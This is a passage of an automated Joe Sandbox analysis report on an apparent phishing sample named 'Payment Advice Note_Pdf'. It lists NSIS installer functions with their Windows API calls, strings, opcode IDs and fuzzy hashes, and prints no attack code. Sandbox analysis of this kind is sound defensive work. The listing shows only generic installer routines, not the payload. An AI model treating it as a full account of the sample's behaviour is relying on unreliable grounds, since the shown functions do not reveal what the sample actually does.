Instruction Fuzzy Hash: 70614771A00101ABDF209F64CC40AAE37A5AF51314F12817FE916BA2D1D73D89A2CB5E

Function 00402DEE Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00402DFF
GetModuleFileNameW.KERNEL32(00000000,00437800,00000400,?,?,00000000,00403504,?), ref: 00402E1B

Part of subcall function 00405BF4: GetFileAttributesW.KERNEL32(00000003,00402E2E,00437800,80000000,00000003,?,?,00000000,00403504,?), ref: 00405BF8
Part of subcall function 00405BF4: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,00403504,?), ref: 00405C1A

GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,00435800,00435800,00437800,00437800,80000000,00000003,?,?,00000000,00403504,?), ref: 00402E67

Strings

Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402FC6
Error launching installer, xrefs: 00402E3E
Null, xrefs: 00402EE5
soft, xrefs: 00402EDC
Inst, xrefs: 00402ED3

Memory Dump Source

Source File: 00000002.00000002.1404753023.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1404721343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404789131.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404823283.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404859591.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-527102705
Opcode ID: 6e52b5e7c28306e97f348f1a058bd92a48c6a7a00700ba41cd1c8924bd10af2a
Instruction ID: cad0cac5a7d3da6b721da94722abfb33afad8597fd9771d3107dd1117b6c1d4f
Opcode Fuzzy Hash: 6e52b5e7c28306e97f348f1a058bd92a48c6a7a00700ba41cd1c8924bd10af2a
Instruction Fuzzy Hash: EA51D471901216ABDB209F64DE89B9E7BB8EB04354F20407BF904F62D1C7BC9D419BAD

Function 0040414A Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00404167
GetSysColor.USER32(00000000), ref: 00404183
SetTextColor.GDI32(?,00000000), ref: 0040418F
SetBkMode.GDI32(?,?), ref: 0040419B
GetSysColor.USER32(?), ref: 004041AE
SetBkColor.GDI32(?,?), ref: 004041BE
DeleteObject.GDI32(?), ref: 004041D8
CreateBrushIndirect.GDI32(?), ref: 004041E2

Memory Dump Source

Source File: 00000002.00000002.1404753023.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1404721343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404789131.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404823283.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404859591.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: bdecbf54746ac4e95bafbcd3f7306951f606de83f5b9b49a03f8dc0a3bab15ec
Instruction ID: 457b5273a6ad35ed29f896ddd043663fa6b3a1b95e22c78e57b6691615e2b460
Opcode Fuzzy Hash: bdecbf54746ac4e95bafbcd3f7306951f606de83f5b9b49a03f8dc0a3bab15ec
Instruction Fuzzy Hash: 1921A1B1804704ABCB219F68DD4CB4BBBF8AF40710F048A29ED92E62E0D734E944CB65

Function 004025E5 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 151fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1

Part of subcall function 00405CD5: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405CEB

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D

Strings

9, xrefs: 00402630

Memory Dump Source

Source File: 00000002.00000002.1404753023.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1404721343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404789131.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404823283.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404859591.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 54de609a95a039770bb902f2e006f13192118be6fe7c7de42288ab6e45ce79fa
Instruction ID: 56da5788d6d90062f79809d4a3c22d6e203981add65e083e01e3e907f30c056e
Opcode Fuzzy Hash: 54de609a95a039770bb902f2e006f13192118be6fe7c7de42288ab6e45ce79fa
Instruction Fuzzy Hash: 3F512774D0021AAADF209F94CA88AAEB779FF04344F50447BE501F72E0D7B99D429B69

Function 0040517E Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(004216E8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B6
lstrlenW.KERNEL32(00403160,004216E8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C6
lstrcatW.KERNEL32(004216E8,00403160,00403160,004216E8,00000000,?,00000000), ref: 004051D9
SetWindowTextW.USER32(004216E8,004216E8), ref: 004051EB
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405211
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040522B
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405239

Memory Dump Source

Source File: 00000002.00000002.1404753023.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1404721343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404789131.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404823283.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404859591.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 6f150b286f1f9d0ced70dbc986b2b305cd6f9c3100323ce425f21e961b416abc
Instruction ID: 21bddbe199db3e121897d5596c22f00b0e76f5ccd37bc28327e30b1938552548
Opcode Fuzzy Hash: 6f150b286f1f9d0ced70dbc986b2b305cd6f9c3100323ce425f21e961b416abc
Instruction Fuzzy Hash: 9E219D71900118BACB219FA5DD84ACFBFB9EF58350F14807AF904B62A0C7798A41CF68

Function 00404A48 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A63
GetMessagePos.USER32 ref: 00404A6B
ScreenToClient.USER32(?,?), ref: 00404A85
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404A97
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404ABD

Strings

f, xrefs: 00404A99

Memory Dump Source

Source File: 00000002.00000002.1404753023.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1404721343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404789131.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404823283.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404859591.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 8f99d7edcbb1b2af9b03d3486fc4037292eab20d77c75a8c6737f0729fb79e96
Instruction ID: 42cc3fd90da340ed33e1658783c39be2c5e0210da91f3d0a8fd677c6224e58ad
Opcode Fuzzy Hash: 8f99d7edcbb1b2af9b03d3486fc4037292eab20d77c75a8c6737f0729fb79e96
Instruction Fuzzy Hash: 19015E71E40218BADB00DB94DD85FFEBBBCAF54711F10016BBB11B61D0D7B8AA058BA5

Function 00402D04 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
MulDiv.KERNEL32(?,00000064,?), ref: 00402D4D
wsprintfW.USER32 ref: 00402D5D
SetWindowTextW.USER32(?,?), ref: 00402D6D
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F

Strings

verifying installer: %d%%, xrefs: 00402D57

Memory Dump Source

Source File: 00000002.00000002.1404753023.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1404721343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404789131.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404823283.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404859591.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: a68141ec73b2a7b0005fea9bea2e0a343ee18c9164241d5958d7192c74469446
Instruction ID: 02b4a25e1ca2abb3aa07e0940f0a1006ed88c36cf357b8fab3844828eab6b7e4
Opcode Fuzzy Hash: a68141ec73b2a7b0005fea9bea2e0a343ee18c9164241d5958d7192c74469446
Instruction Fuzzy Hash: 3E01F471640209ABEF249F61DD49FEA3B69EB04305F008035FA05A92D1DBB999548F59

Function 00402840 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
GlobalFree.KERNEL32(?), ref: 004028E9
GlobalFree.KERNEL32(00000000), ref: 004028FC
CloseHandle.KERNEL32(?), ref: 00402914
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928

Memory Dump Source

Source File: 00000002.00000002.1404753023.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1404721343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404789131.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404823283.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404859591.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 03aa666f85b5086d55da66d7c72f0d5cc7ba428cd5d4b6be5cd12f1f914a7ebe
Instruction ID: ec7c0e824f3835a9a78c8c015c1ffbc75d15747d838d6b82ce361eed526a9b83
Opcode Fuzzy Hash: 03aa666f85b5086d55da66d7c72f0d5cc7ba428cd5d4b6be5cd12f1f914a7ebe
Instruction Fuzzy Hash: 1B219E72C00118BBCF216FA5CD49D9E7E79EF09324F24027AF520762E1C7796D419BA9

Function 00403027 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00403088
GetTickCount.KERNEL32 ref: 00403109
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403136
wsprintfW.USER32 ref: 00403149

Strings

... %d%%, xrefs: 00403143

Memory Dump Source

Source File: 00000002.00000002.1404753023.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1404721343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404789131.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404823283.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404859591.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%
API String ID: 551687249-2449383134
Opcode ID: a343a4c063a300aa48b8a2a22e4f832337208c7e9ff1a6e1000531eddc44bc0b
Instruction ID: dc339ecebd5a12fc0f5e273b782e0acc65c92b35cb5ec2ffb99f959b3dc2fe49
Opcode Fuzzy Hash: a343a4c063a300aa48b8a2a22e4f832337208c7e9ff1a6e1000531eddc44bc0b
Instruction Fuzzy Hash: CC517A71900219ABDB10DF65D904B9F3FA8AF04766F14427BF911BB2C5C7789E408BE9

Function 004062B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(00409300,*?|<>/":,00000000,00434000,763C3420,00436800,00000000,00403245,00436800,00436800,00403496), ref: 00406316
CharNextW.USER32(00409300,00409300,00409300,00000000), ref: 00406325
CharNextW.USER32(00409300,00434000,763C3420,00436800,00000000,00403245,00436800,00436800,00403496), ref: 0040632A
CharPrevW.USER32(00409300,00409300,763C3420,00436800,00000000,00403245,00436800,00436800,00403496), ref: 0040633D

Strings

*?|<>/":, xrefs: 00406305

Memory Dump Source

Source File: 00000002.00000002.1404753023.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1404721343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404789131.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404823283.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404859591.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: 6a1238fba9ba947ddf3d1c913c8afd34c4b382e8901ee0696378a8a11e3e1ee4
Instruction ID: 54bf27a4ef4c29ba7f7e7f80dc621db20ebbd613429789f6f10e18307ece98db
Opcode Fuzzy Hash: 6a1238fba9ba947ddf3d1c913c8afd34c4b382e8901ee0696378a8a11e3e1ee4
Instruction Fuzzy Hash: B711946A80021295EB313B198C40AB7B6F8EF59750F56417FED86B32C0E77C5C9286ED

Function 00401767 Relevance: 7.6, APIs: 5, Instructions: 145stringtimeCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(00000000,00000000,004095C8,00435000,?,?,00000031), ref: 004017A8
CompareFileTime.KERNEL32(-00000014,?,004095C8,004095C8,00000000,00000000,004095C8,00435000,?,?,00000031), ref: 004017CD

Part of subcall function 0040601F: lstrcpynW.KERNEL32(00409300,00409300,00000400,0040331A,00428220,NSIS Error), ref: 0040602C

Part of subcall function 0040517E: lstrlenW.KERNEL32(004216E8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B6
Part of subcall function 0040517E: lstrlenW.KERNEL32(00403160,004216E8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C6
Part of subcall function 0040517E: lstrcatW.KERNEL32(004216E8,00403160,00403160,004216E8,00000000,?,00000000), ref: 004051D9
Part of subcall function 0040517E: SetWindowTextW.USER32(004216E8,004216E8), ref: 004051EB
Part of subcall function 0040517E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405211
Part of subcall function 0040517E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040522B
Part of subcall function 0040517E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405239

Memory Dump Source

Source File: 00000002.00000002.1404753023.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1404721343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404789131.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404823283.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404859591.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID:
API String ID: 1941528284-0
Opcode ID: 8325a28b68e5ca19d4bc977661c25da83fc150c09986b3e1d02f34377a086496
Instruction ID: e39dfb19bb2720adffc224853af95c022162de9bd11196ce21bc9617d3384428
Opcode Fuzzy Hash: 8325a28b68e5ca19d4bc977661c25da83fc150c09986b3e1d02f34377a086496
Instruction Fuzzy Hash: 9041D571900515BACF20BFB5CC45DAF3679EF45328B20427BF422B50E2DB3C8A519A6D

Function 00402BFF Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
RegCloseKey.ADVAPI32(?), ref: 00402C65
RegCloseKey.ADVAPI32(?), ref: 00402C8A
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8

Memory Dump Source

Source File: 00000002.00000002.1404753023.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1404721343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404789131.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404823283.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404859591.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 6121e8ff7f107a9e0c5c71db51fa80124b77cb8196dbe3be819c2b517f5432bf
Instruction ID: 783455ef39ba97bad4d92773a6bd33e03ba47aaf13af7a3f43d32fd345691cd1
Opcode Fuzzy Hash: 6121e8ff7f107a9e0c5c71db51fa80124b77cb8196dbe3be819c2b517f5432bf
Instruction Fuzzy Hash: 52115971908118FEEF119F90DE8CEAE3B79FB14384F100476FA05A10A0D3B49E52AA69

Function 00401CFA Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D00
GetClientRect.USER32(00000000,?), ref: 00401D0D
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
DeleteObject.GDI32(00000000), ref: 00401D4B

Memory Dump Source

Source File: 00000002.00000002.1404753023.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1404721343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404789131.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404823283.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404859591.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 0a3c0bdb66add2d7fa57481b61051824d1ce7e825afd8a911da6e4014869532d
Instruction ID: fda10597d29eaa6b078217e10feb255e8dba845150ef54d65940bec6a2f4d034
Opcode Fuzzy Hash: 0a3c0bdb66add2d7fa57481b61051824d1ce7e825afd8a911da6e4014869532d
Instruction Fuzzy Hash: 3AF0C972A04104AFDB11DBA4EE88CEEBBBDEB48311B104566F602F61A1C675ED418B39

Function 00401D56 Relevance: 7.5, APIs: 5, Instructions: 38COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D59
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
ReleaseDC.USER32(?,00000000), ref: 00401D86
CreateFontIndirectW.GDI32(0040BDD0), ref: 00401DD1

Memory Dump Source

Source File: 00000002.00000002.1404753023.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1404721343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404789131.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404823283.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404859591.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: 262b44a4cebd5a702222bed33ce5d9c56750fe8d0652de1045a3a1dc6affe4f0
Instruction ID: f0de02ddeea559f0acc09b7c654b6cc4e6647674a776793065cdf7257ef1e696
Opcode Fuzzy Hash: 262b44a4cebd5a702222bed33ce5d9c56750fe8d0652de1045a3a1dc6affe4f0
Instruction Fuzzy Hash: FF01A231948244BFE701ABB0AE5EBDA7F74EB65305F004479F551B62E2C77810008B6E

Function 0040493A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00422708,00422708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 004049DB
wsprintfW.USER32 ref: 004049E4
SetDlgItemTextW.USER32(?,00422708), ref: 004049F7

Strings

%u.%u%s%s, xrefs: 004049C5

Memory Dump Source

Source File: 00000002.00000002.1404753023.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1404721343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404789131.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404823283.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404859591.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: aa53908fce4cc0b3bc5514d6eb52531752f7e9eb1f9d539712d9fac33a0b6f92
Instruction ID: f455ebafcbecf6c6930287b8ee8bcbe2db44ea01d8d71c40407b913fda14730a
Opcode Fuzzy Hash: aa53908fce4cc0b3bc5514d6eb52531752f7e9eb1f9d539712d9fac33a0b6f92
Instruction Fuzzy Hash: D611D87364412867DB10A6BD9C45EAF3288DB85374F250237FA26F61D2DA798C6182D8

Function 00401BDF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57

Strings

!, xrefs: 00401C13

Memory Dump Source

Source File: 00000002.00000002.1404753023.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1404721343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404789131.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404823283.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404859591.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 89185f19cab5c9d2123c9567e553a40f312bc8837cbfc1fecf3123f783c5ad12
Instruction ID: a67f43666b390050b7c93cc16dc22df3288c4645dfbd1c9967af83c22614668d
Opcode Fuzzy Hash: 89185f19cab5c9d2123c9567e553a40f312bc8837cbfc1fecf3123f783c5ad12
Instruction Fuzzy Hash: 7C21B071944209BEEF01AFB0CE4AABE7B75EB40304F10403EF601B61D1D6B89A409B69

Function 00406389 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063A0
wsprintfW.USER32 ref: 004063DB
LoadLibraryW.KERNEL32(?), ref: 004063EB

Strings

%s%S.dll, xrefs: 004063D5

Memory Dump Source

Source File: 00000002.00000002.1404753023.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1404721343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404789131.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404823283.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404859591.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll
API String ID: 2200240437-2744773210
Opcode ID: 8eb02a3bbd68b69db90ac38405ec0e3d1a99f1663c9491293569e02019d06da0
Instruction ID: 006adf5c24d44cc190f28e383f23d96ea846dcb1794efbef959ff2cbc64c9496
Opcode Fuzzy Hash: 8eb02a3bbd68b69db90ac38405ec0e3d1a99f1663c9491293569e02019d06da0
Instruction Fuzzy Hash: D6F09030910119EBDB14AB68DD4DEAB366CAB00304F104476A906F21E1E77CEA68CBE9

Function 0040237B Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
lstrlenW.KERNEL32(0040A5C8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
RegSetValueExW.ADVAPI32(?,?,?,?,0040A5C8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
RegCloseKey.ADVAPI32(?,?,?,0040A5C8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6

Memory Dump Source

Source File: 00000002.00000002.1404753023.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1404721343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404789131.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404823283.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404859591.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID:
API String ID: 1356686001-0
Opcode ID: 60f996d0ed5f7810496b9bd66fef694276fdb4bf1e2feafbf67f95f7d2284aca
Instruction ID: 7111b63e716528206d7143fef0c5d48aa4ff5df43585b472b347a68cc626e816
Opcode Fuzzy Hash: 60f996d0ed5f7810496b9bd66fef694276fdb4bf1e2feafbf67f95f7d2284aca
